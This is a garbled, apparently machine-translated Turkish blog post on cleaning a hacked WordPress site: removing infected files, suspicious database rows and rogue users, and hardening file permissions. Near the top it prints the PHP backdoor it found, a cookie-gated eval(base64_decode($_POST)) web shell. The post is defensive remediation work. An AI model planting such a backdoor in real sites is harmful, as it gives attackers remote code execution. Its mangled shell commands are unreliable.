WordPress Exploit - Virüs dosyalarını, SQL'i ve sunucu güvenliğini temizleyin.

Bu yazıyı okumadan önce, görmelisiniz yazı burada, Bir şey anlamak için. :)

Birkaç blog dosyasında buldum stealthsettings.com, virüs bulaşmasının bir sonucu olarak ortaya çıkan, aşağıdakilere benzer kodlar başarı WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcBu dosya yukarıda ise xmlrpc.php arasında UykuluAma bir de grep sunucu, kaynak kodunu kendi türünde epeyce olduğunu görebilirsiniz.

pppffiuuu

Virüslü dosyaları temizleme:

Ooookkkk ...
1. En iyi çözüm, bu evlilikten sonra yedekVe temizlenmiş veritabanı için silme Dosyaları WordPress (wp-config.php'yi ve kesinlikle wp platformuyla ilgili olmayan dosyaları dikkatlice kontrol edildikten sonra saklayabilirsiniz) sunucudan ve orijinal olanları sürümden yükleyin 2.5.1 (Bu esnada bir WP sürüm yükseltme :) yapmak) http://wordpress.org/download/ . Onların Titiz kontrole güven yoksa tema dosyaları da dahil olmak üzere silin.

Bu etkilenmiş görünüyor ve blogda daha önce kullanılan ve sadece temayı değiştirerek henüz temaları dosyaları, sorunu çözmez.

./andreea/wp-content/themes/default/index.php:

2. Içeren tüm dosyaları arayın ve silin: * _new.php, * _old.php, * Jpgg, * Giff, * Pngg ve dosya wp-info.txt varsa....

bul. -name “* _new.php”
bul. -name “* _old.php”
bul. -name “* .jpgg”
bul. -name “* _giff”
bul. -name “* _pngg”
bul. -name “wp-info.txt”

3. içinde / Tmp , Arama ve benzeri klasörleri silmek tmpYwbzT2

SQL Temizleme :

1. Tablo Tablo wp_options çizgiler silmek olup olmadığını görmek: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Hepsi wp_ içindeoptions, git active_plugins uzantıları * _new.php, * _old.php, *. jpgg, *. giff, *. pngg veya başka bir uzantısı olduğundan şüphelenildiği takdirde dikkatlice kontrol birinde biten bir eklenti varsa ve silin.

3. Tablo wp_usersOnun sağ bir şey yazmamış bir kullanıcı, sütun varsa, bakınız user_nicename. Bu kullanıcıyı silin, ancak kimlik sütunundaki numarayı unutmayın. Bu kullanıcı muhtemelen "WordPress"CA user_login 00: 00 00-0000-00 ve 00 oluşturulmuş gibi görünüyor.

4. Tablo git wp_usermeta ve yukarıda kimliği ait bütün satırları silin.

Bu sql temizliğini yaptıktan sonra, herhangi bir eklentiyi devre dışı bırakın ve ardından etkinleştirin. (blogda -> Gösterge Tablosu -> Eklentiler)

Güvenli sunucu:

1. "Dizin ve dosyaları ne bakyazılabilir"(chmod 777) ve bir koymaya çalışın chmod bu da artık herhangi bir düzeyde yazmalarına izin vermeyecek. (chmod 644, örneğin)

Bulun. -Perm-2-ls

2. Dosyaları bit kümesi ne var bakın suid veya sgid . Kullanmak istemiyorsanız, bu dosyaları onları koymak chmod 0 veya içerdiği paketi kaldırmak. Onlar "ayrıcalıklar yürütmek, çünkü çok tehlikeliGrup"Ya da"kök"Ve normal kullanıcı ayrıcalıkları ile bu dosyayı yürütmek için değil.

f-perma-04000-ls / tipi bulabilirsiniz
f-perma-02000-ls / tipi bulabilirsiniz

3. Hangi portların açık olduğuna kontrol edin ve alışık olmadığımız bu kapatma veya sabitlemek için deneyin.

netstat-an | grep-i dinle

Onun hakkında. Görüyorum Bazı bloglar yasaklandı de Google Search ve diğerleri "Onları iyi yaptı!!!" . Şey, onlar için yapardım... ama Google yasaklamaya başlarsa ne dersin? tüm siteler şekillendirme  SPAM IS ve (Truva atları koymakTrojan.Clicker.HTML) çerezlerde?

Teknolojiye tutkulu, 2006 yılından beri StealthSettings.com'da yazıyorum. macOS, Windows ve Linux işletim sistemlerinde geniş deneyimim var, aynı zamanda programlama dilleri ve blog platformları (WordPress) ile online mağazalar için (WooCommerce, Magento, PrestaShop) bilgi sahibiyim.

nasıl » AntiVirüs ve Güvenlik » WordPress Exploit - Virüs dosyalarını, SQL'i ve sunucu güvenliğini temizleyin.

1 düşünce "WordPress Exploit - Virüs dosyalarını, SQL'i ve sunucu güvenliğini temizleyin. ”

Leave a Comment